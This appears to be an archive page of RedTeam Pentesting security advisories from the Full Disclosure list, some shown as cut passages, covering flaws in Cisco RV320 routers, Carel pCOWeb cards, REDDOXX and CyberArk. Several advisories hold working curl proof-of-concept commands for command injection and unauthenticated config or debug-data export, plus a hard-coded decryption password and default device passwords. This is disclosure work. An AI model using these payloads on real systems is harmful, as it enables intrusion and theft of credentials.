Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC
sr/local/root/flash/etc/sysconfig/userspwd PROOT=froot PHTTP=fhttpadmin PGUEST=fguest PCAREL=fcarel Workaround == Change all default passwords listed above and ensure the user "nobody" is disabled or has a password set. The Carel pCOWeb card should not be connected to networks accessible by untrusted users (compare advisory rt-sa-2019-014[1]). Fix === No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators. Security Risk = Attackers with knowledge of one set of user credentials to a Carel pCOWeb card could use the password hashes accessible to all users in "/etc/passwd" or the plaintext copies of the passwords to gain different privileges. Due to the necessity of access to credentials, this is considered to pose a low risk only. Timeline 2019-07-17 Vulnerability identified 2019-08-03 Customer approved disclosure to vendor 2019-09-02 Vendor notified 2019-09-09 Vendor did not respond as promised 2019-09-17 Vendor could not be reached 2019-09-18 Vendor could not be reached 2019-09-18 Vendor could not be reached 2019-10-28 Advisory published due to publication of CVE-2019-13553 References ====== [0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0 [1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ===== RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-012] Information Disclosure in REDDOXX Appliance
--- It provides details about the used license (serial number replaced by random value for demonstration purposes): { "version": "1.1", "id": "{----}", "result": { "License": { "Activated": true, "ActivationDate": "2000-01-01T12:34:56", "ApplianceID": "1234", "ArchiveLicenses": "1", "Cluster": false, "Customer": "Example Ltd.", "HasFullMaildepotLicense": true, "HasFullSpamfinderLicense": true, "HasMaildepotPremiumLicense": true, "MailDepotImporterLicense": false, "MailSealerLicenses": "1", "MailSealerSignatureLicense": false, "MsxAgentLicenses": "1", "SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y", "ServiceDate": "1899-12-30T00:00:00", "SpamfinderLicenses": "1", "SubscriptionDate": "2020-01-30T12:34:56", "Valid": true, "VirusScan": true } } } Workaround == None Fix === Install the latest hotfixes for the appliance, see [2]. Security Risk = The risk of the information disclosure through the two API calls is estimated to be low. Although the API calls should not be available without authentication, "CoreService.GetRealmList" will only return rudimentary information about the authentication realms and "CoreService.GetLicense" is mostly a problem for the vendor, as the serial number could be misused to set up a licensed application without paying. Timeline 2019-05-21 Vulnerability identified 2019-05-24 Customer approved disclosure to vendor 2019-06-04 Vendor notified 2019-06-05 Vendor acknowledges the vulnerability 2019-06-17 Vendor released hotfix 2019-06-24 Customer approved release 2019-07-01 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) [2] https://appliance.docs.reddoxx.com/de/release-notes/release-notes-version-2032-service-pack-2-2-2-1242 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway
closure for May 1st to RedTeam Pentesting 2019-05-01 Vendor publishes advisory 2019-05-16 Customer approves release of this advisory 2019-05-17 Advisory released References == [1] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo47769 [2] https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html [3] https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Orange%20Tsai%20-%20Updated/DEFCON-26-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out-Updated.pdf [4] https://tomcat.apache.org RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-005] Cisco RV320 Command Injection Retrieval
Advisory: Cisco RV320 Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router which was inadequately patched by the vendor. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15 through 1.4.2.20 Fixed Versions: none Vulnerability Type: Remote Code Execution Security Risk: medium Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject Vendor Status: working on patch Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005 Advisory Status: published CVE: CVE-2019-1652 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 Introduction "Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network." (from the Cisco RV320 product page [1]) More Details The router's web interface enables users to generate new X.509 certificates directly on the device. Previously, RedTeam Pentesting identified a vulnerability (rt-sa-2018-004) [2] in this component. By providing a specially crafted common name, it was possible to inject shell commands which were subsequently executed on the router as the root user. This vulnerability was adressed in firmware version 1.4.2.19 published by Cisco [3]. RedTeam Pentesting discovered that the certificate generator in the patched firmware is still vulnerable. The update adds several filters to handle single quotes in user input. However, these filters can be evaded by specially crafted inputs. By providing the following string for the certificate's common name, a "ping" command can be injected: 'a$(ping -c 4 192.168.1.2)'b Proof of Concept The following HTTP POST request invokes the certificate generator function and triggers the command injection. It requires a valid session cookie for the device's web interface. The user agent "curl" is blacklisted by the firmware and must be adjusted in the HTTP client. $ curl -s -k -A kurl -X POST -b "$COOKIE" \ --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\ "&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\ "&organization=A&organization_unit=A&email=ab%40example.com"\ "&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\ "SelectSubject_s=1" \ --data-urlencode "common_name='a\$(ping -c 4 192.168.1.2)'b" \ "https://192.168.1.1/certificate_handle2.htm?type=4"; Afterwards, the incoming ICMP echo requests can be observed on the attacker's system at 192.168.1.2. Workaround == Prevent untrusted users from using the router's web interface. Fix === None Security Risk = The vulnerability allows attackers with administrative access to the router's web interface to execute arbitrary operating system commands on the device. Because attackers require valid credentials to the web interface, this vulnerability is only rated as a medium risk. Timeline 2018-09-19 Original vulnerability identified 2018-09-27 Customer approved disclosure to vendor 2018-09-28 Vendor notified 2018-10-05 Receipt of advisory acknowledged by vendor 2018-10-05 Notified vendor of disclosure date: 2019-01-09 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor 2019-01-16 List of affected versions provided by vendor 2019-01-22 Firmware 1.4.2.20 released by vendor 2019-01-23 Advisory (rt-sa-2018-004) published 2019-02-07 Incomplete mitigation of vulnerability identified 2019-02-08 Proof of concept sent to vendor 2019-02-08 Receipt of proof of concept acknowledged by vendor 2019-02-15 Full advisory sent to vendor 2019-02-15 Notified vendor of disclosure date: 2019-03-27 2019-03-25 Requested progress update from vendor 2019-03-25 Vendor requests postponed disclosure 2019-03-25 Postponement declined 2019-03-27 Advisory published References == [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html [2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 [3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests
[FD] [RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval
3 [3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export
Advisory: Cisco RV320 Unauthenticated Configuration Export RedTeam Pentesting discovered that the configuration of a Cisco RV320 router can still be exported without authentication via the device's web interface due to an inadequate fix by the vendor. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15 through 1.4.2.20 Fixed Versions: none Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info Vendor Status: working on patch Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003 Advisory Status: published CVE: CVE-2019-1653 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 Introduction "Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network." (from the Cisco RV320 product page [1]) More Details The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based configuration interface, which is implemented in various CGI programs in the device's firmware. Access to this web interface requires prior authentication using a username and password. Previously, RedTeam Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI program: /cgi-bin/config.exp By issuing an HTTP GET request to this program, it was possible to export a router's configuration without providing any prior authentication. This vulnerability was adressed in firmware version 1.4.2.19 published by Cisco [3]. RedTeam Pentesting discovered that the CGI program in the patched firmware is still vulnerable. By performing a specially crafted HTTP POST request, attackers are still able to download the router's configuration. The user agent "curl" is blacklisted by the firmware and must be adjusted in the HTTP client. Again, exploitation does not require any authentication. Proof of Concept A device's configuration can be retrieved by issuing an HTTP POST request to the vulnerable CGI program (output shortened): $ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \ 'https://192.168.1.1/cgi-bin/config.exp' sysconfig [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX [...] [SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 [...] Workaround == Prevent untrusted clients from connecting to the device's web server. Fix === None Security Risk = This vulnerability is rated as a high risk as it exposes the device's configuration to untrusted, potentially malicious parties. By downloading the configuration, attackers can obtain internal network configuration, VPN or IPsec secrets, as well as password hashes for the router's user accounts. Knowledge of a user's password hash is sufficient to log into the router's web interface, cracking of the hash is not required. Any information obtained through exploitation of this vulnerability can be used to facilitate further compromise of the device itself or attached networks. Timeline 2018-09-19 Original vulnerability identified 2018-09-27 Customer approved disclosure to vendor 2018-09-28 Vendor notified 2018-10-05 Receipt of advisory acknowledged by vendor 2018-10-05 Notified vendor of disclosure date: 2019-01-09 2018-11-18 List of affected versions provided by vendor 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor 2019-01-22 Firmware 1.4.2.20 released by vendor 2019-01-23 Advisory (rt-sa-2018-002) published 2019-02-07 Incomplete mitigation of vulnerability identified 2019-02-08 Proof of concept sent to vendor 2019-02-08 Receipt of proof of concept acknowledged by vendor 2019-02-15 Full advisory sent to vendor 2019-02-15 Notified vendor of disclosure date: 2019-03-27 2019-03-25 Requested progress update from vendor 2019-03-25 Vendor requests postponed disclosure 2019-03-25 Postponement declined 2019-03-27 Advisory published References == [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html [2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 [3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immedi
[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple
responded, document is not updated/maintained any more 2019-03-20 CVE ID requested 2019-03-21 CVE ID assigned 2019-03-26 Advisory released References == [1] https://www.tldp.org/LDP/abs/html/ [2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE [3] https://www.tldp.org/LDP/abs/html/internal.html#EX33 [4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2018-004] Cisco RV320 Command Injection
Advisory: Cisco RV320 Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15 and later Fixed Versions: since 1.4.2.20 Vulnerability Type: Remote Code Execution Security Risk: medium Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 Advisory Status: published CVE: CVE-2019-1652 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 Introduction "Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network." (from the Cisco RV320 product page [1]) More Details The router's web interface enables users to generate new X.509 certificates directly on the device. A user may enter typical configuration parameters required for the certificate, such as organisation, the common name and so on. In order to generate the certificate, the device uses the command-line program openssl [2]. The device's firmware uses the following format string to assemble the openssl command: openssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1 Although the web interface filters certain special characters via JavaScript, there is actually no input filtering, escaping or encoding happening on the server. This allows attackers to inject arbitrary commands. Proof of Concept Even though all components of the subject seem to be vulnerable to command injection, the following example uses the common name to trigger a ping command: a'$(ping -c 4 192.168.1.2)'b The following HTTP POST request invokes the certificate generator function and triggers the command injection. It requires a valid session cookie for the device's web interface. curl -s -b "$COOKIE" \ --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\ "&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\ "&organization=A&organization_unit=A&email=ab%40example.com"\ "&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\ "SelectSubject_s=1" \ --data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \ "http://192.168.1.1/certificate_handle2.htm?type=4"; Afterwards, the incoming ICMP echo requests can be observed on the attacker's system at 192.168.1.2. Workaround == Prevent untrusted users from using the router's web interface. Fix === Install firmware version 1.4.2.20 (or later) on the router. Security Risk = The vulnerability allows attackers with administrative access to the router's web interface to execute arbitrary operating system commands on the device. Because attackers require valid credentials to the web interface, this vulnerability is only rated as a medium risk. Timeline 2018-09-19 Vulnerability identified 2018-09-27 Customer approved disclosure to vendor 2018-09-28 Vendor notified 2018-10-05 Receipt of advisory acknowledged by vendor 2018-10-05 Notified vendor of disclosure date: 2019-01-09 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor 2019-01-16 List of affected versions provided by vendor 2019-01-23 Advisory published References == [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html [2] https://wiki.openssl.org/index.php/Command_Line_Utilities RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories
[FD] [RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval RedTeam Pentesting discovered that the Cisco RV320 router exposes sensitive diagnostic data without authentication through the device's web interface. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15, 1.4.2.17 Fixed Versions: since 1.4.2.19 Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003 Advisory Status: published CVE: CVE-2019-1653 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 Introduction "Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network." (from the Cisco RV320 product page [1]) More Details The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based configuration interface. In the device's firmware, this functionality is implemented using a variety of CGI programs. Access to this web interface requires prior authentication using a username and password. RedTeam Pentesting discovered the CGI program: /cgi-bin/export_debug_msg.exp This program can be used to retrieve various diagnostic information from the device, which includes its current configuration. In contrast to other functions, this CGI program does not require any form of authentication. It may be accessed through the router's web server, which is available from the LAN by default. As described in [2], firmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web server to the WAN on TCP port 8007. Proof of Concept The diagnostic data can be retrieved by issuing an HTTP POST request to the vulnerable CGI program. OpenSSL is used to decrypt the data with the hard-coded password "NKDebug12#$%" before unpacking it with tar (output shortened): $ curl --data submitdebugmsg=1 \ 'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug $ openssl aes-128-cbc -salt -md md5 -d \ -k 'NKDebug12#$%' < debug > debug.tgz $ mkdir output && tar -xf debug.tgz -C output/ $ ls -1 output/ debug_messages.txt etc.tgz nk_sysconfig var.tgz $ cat output/nk_sysconfig sysconfig [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX [...] [SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 [...] Workaround == Prevent untrusted clients from connecting to the device's web server. Fix === Install firmware version 1.4.2.19 (or later) on the router. Security Risk = This vulnerability is rated as a high risk as it exposes sensitive diagnostic information, such as the device's configuration, to untrusted, potentially malicious parties. By retrieving this information, attackers can obtain internal network configuration, VPN or IPsec secrets, as well as password hashes for the router's user accounts. Knowledge of a user's password hash is sufficient to log into the router's web interface. Any information obtained through exploitation of this vulnerability can be used to facilitate further compromise of the device itself or attached networks. Timeline 2018-09-19 Vulnerability identified 2018-09-27 Customer approved disclosure to vendor 2018-09-28 Vendor notified 2018-10-05 Receipt of advisory acknowledged by vendor 2018-10-05 Notified vendor of disclosure date: 2019-01-09 2018-11-18 List of affected versions provided by vendor 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor 2019-01-23 Advisory published References == [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html [2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentest
[FD] [RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export
Advisory: Cisco RV320 Unauthenticated Configuration Export RedTeam Pentesting discovered that the configuration of a Cisco RV320 router may be exported without authentication through the device's web interface. Details === Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected Versions: 1.4.2.15, 1.4.2.17 Fixed Versions: since 1.4.2.19 Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 Advisory Status: published CVE: CVE-2019-1653 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 Introduction "Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network." (from the Cisco RV320 product page [1]) More Details The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based configuration interface. In the device's firmware, this functionality is implemented using a variety of CGI programs. Access to this web interface requires prior authentication using a username and password. RedTeam Pentesting discovered the CGI program: /cgi-bin/config.exp This program can be used to export the router's configuration. In contrast to other functions, this CGI program does not require any form of authentication. It may be accessed through the router's web server, which is available from the LAN by default. As described in [2], firmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web server to the WAN on TCP port 8007. Proof of Concept A device's configuration can be retrieved by issuing an HTTP GET request to the vulnerable CGI program (output shortened): $ curl -s http://192.168.1.1/cgi-bin/config.exp sysconfig [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX [...] [SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 [...] Workaround == Prevent untrusted clients from connecting to the device's web server. Fix === Install firmware version 1.4.2.19 (or later) on the router. Security Risk = This vulnerability is rated as a high risk as it exposes the device's configuration to untrusted, potentially malicious parties. By downloading the configuration, attackers can obtain internal network configuration, VPN or IPsec secrets, as well as password hashes for the router's user accounts. Knowledge of a user's password hash is sufficient to log into the router's web interface. Any information obtained through exploitation of this vulnerability can be used to facilitate further compromise of the device itself or attached networks. Timeline 2018-09-19 Vulnerability identified 2018-09-27 Customer approved disclosure to vendor 2018-09-28 Vendor notified 2018-10-05 Receipt of advisory acknowledged by vendor 2018-10-05 Notified vendor of disclosure date: 2019-01-09 2018-11-18 List of affected versions provided by vendor 2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor 2019-01-23 Advisory published References == [1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html [2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature
[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure
35f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h 0110: 62 Starting at offset 0xe0, the vault discloses a total of 49 bytes of its memory to the client. Workaround == None Fix === Upgrade CyberArk Password Vault to version 9.7 or 10. Security Risk = This vulnerability is rated as a high risk. Exploitation only requires network access to a PrivateArk Password Vault. Although each request only discloses about 50 bytes of memory, sustained exploitation will likely reveal sensitive information at some point in time. This critically undermines the primary purpose of the PrivateArk Password Vault. Timeline 2017-11-24 Vulnerability identified 2018-01-22 Customer approved disclosure to vendor 2018-02-05 Vendor notified 2018-04-06 CVE number requested 2018-04-07 CVE number assigned 2018-04-09 Advisory released References == [1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution
